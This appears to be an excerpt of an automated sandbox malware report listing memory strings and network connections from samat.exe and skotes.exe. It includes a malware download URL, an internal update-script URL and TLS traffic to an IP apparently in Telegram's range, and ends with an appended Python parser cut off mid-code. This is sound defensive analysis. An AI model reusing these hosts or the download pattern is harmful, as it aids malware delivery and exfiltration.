Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
Source: samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://json.org
Source: svchost.exe, 00000019.00000002.6314363798.0000022FAD702000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com:443/RST2.srf
Source: samat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527191112.000001BCCC8B7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mahler:8092/site-updates.py
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531201836.000001BCCD413000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532208300.000001BCCD415000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516814567.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529818458.000001BCCC96F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551562745.000001BCCC972000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560430089.000001BCCC973000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526822123.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532440818.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530927299.000001BCCC7FD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559196622.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516814567.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529818458.000001BCCC96F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551562745.000001BCCC972000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560430089.000001BCCC973000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526822123.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: samat.exe, 00000008.00000003.3002201844.000001BCCBFC1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4557702763.000001BCCC500000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008392971.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://peps.python.org/pep-0205/
Source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://peps.python.org/pep-0263/
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://peps.python.org/pep-0685/
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://peps.python.org/pep-0685/Pp
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pypi.org/project/build/).
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pypi.org/project/importlib_metadata
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pypi.org/project/setuptools/
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://requests.readthedocs.io
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/
Source: samat.exe, 00000008.00000003.3015789886.000001BCCC368000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008939140.000001BCCC35F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
Source: samat.exe, 00000008.00000003.3016877538.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3021175651.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3014481401.000001BCCC494000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504313591.000001BCCC469000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008939140.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3014733441.000001BCCC495000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020091541.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: samat.exe, 00000008.00000002.4557868272.000001BCCC600000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
Source: samat.exe, 00000008.00000002.4557868272.000001BCCC600000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0
Source: samat.exe, 00000008.00000003.3008901685.000001BCCC4B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;
Source: samat.exe, 00000008.00000003.3008901685.000001BCCC4B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;r
Source: skotes.exe, 00000006.00000003.2967423453.000000000113A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2967280151.000000000113A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://thedotmediagroup.com/samat.exe
Source: skotes.exe, 00000006.00000003.2967423453.000000000111F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://thedotmediagroup.com/samat.exe4
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563930588.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: samat.exe, 00000008.00000003.4527003356.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509758777.000001BCCC85C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC85E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wheel.readthedocs.io/
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wheel.readthedocs.io/en/stable/news.html
Source: samat.exe, 00000008.00000003.4523254156.000001BCCC351000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510813361.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4533987100.000001BCCC355000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505782582.000001BCCC34F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC895000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC339000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506796860.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503973184.000001BCCC339000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518665999.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547284877.000001BCCC355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4569235767.00007FF8A88D4000.00000002.00000001.01000000.00000015.sdmp, samat.exe, 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.openssl.org/H
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org
Source: samat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4525393736.000001BCCC8BC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/dev/peps/pep-0427/
Source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.python.org/psf/license/)
Source: samat.exe, 00000008.00000003.4499341916.000001BCCC9FF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560683562.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532754927.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527548212.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://yahoo.com/
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50182
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50185
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50187
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50159
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown Network traffic detected: HTTP traffic on port 50157 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50171
Source: unknown Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown HTTPS traffic detected: 188.165.52.14:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50152 version: TLS 1.2
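The "Network traffic detected" lines above record each direction of a TLS session separately (client ephemeral port -> 443, then 443 -> client port), and only the two "HTTPS traffic detected" lines attribute a client port to a server address. The script below is an added example written for this page, not Joe Sandbox's own tooling: it folds those per-direction lines into one row per client port, joins the TLS attribution, and labels the server side against a small range table. The sample input is constructed from a subset of the lines above (50157 is deliberately given only one direction so the half-open check has something to report); the 149.154.160.0/20 range is the one Telegram publishes for its API and is an assumption to verify against the current list, and the 0.95-style thresholds and field names are this example's own.

```python
"""Fold Joe Sandbox per-direction network lines into one row per client
connection and tag the server side.  Stdlib only."""
import ipaddress
import re
from collections import Counter, defaultdict

PORT_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected: ([\d.]+):(\d+) -> ([\d.]+):(\d+) version: (TLS [\d.]+)"
)

# Constructed label table.  The Telegram entry is the range the service
# publishes for api.telegram.org (assumption: re-check before relying on it).
KNOWN_RANGES = {
    "telegram-api": ipaddress.ip_network("149.154.160.0/20"),
}

# Constructed sample: a subset of the report's own lines, with 50157 left
# half-open on purpose.
SAMPLE = """\
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown HTTPS traffic detected: 188.165.52.14:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50152 version: TLS 1.2
""".splitlines()


def label_ip(ip: str) -> str:
    """Name the first known range containing ip, else 'unknown'."""
    addr = ipaddress.ip_address(ip)
    for name, net in KNOWN_RANGES.items():
        if addr in net:
            return name
    return "unknown"


def summarize(lines, service_port: int = 443) -> dict:
    """Map client port -> {directions seen, server IP, TLS version, label}."""
    conns = defaultdict(lambda: {
        "client_to_server": False, "server_to_client": False,
        "server": None, "tls": None, "label": None,
    })
    for line in lines:
        m = PORT_RE.search(line)
        if m:
            src, dst = int(m.group(1)), int(m.group(2))
            if dst == service_port:          # "client -> 443": outbound
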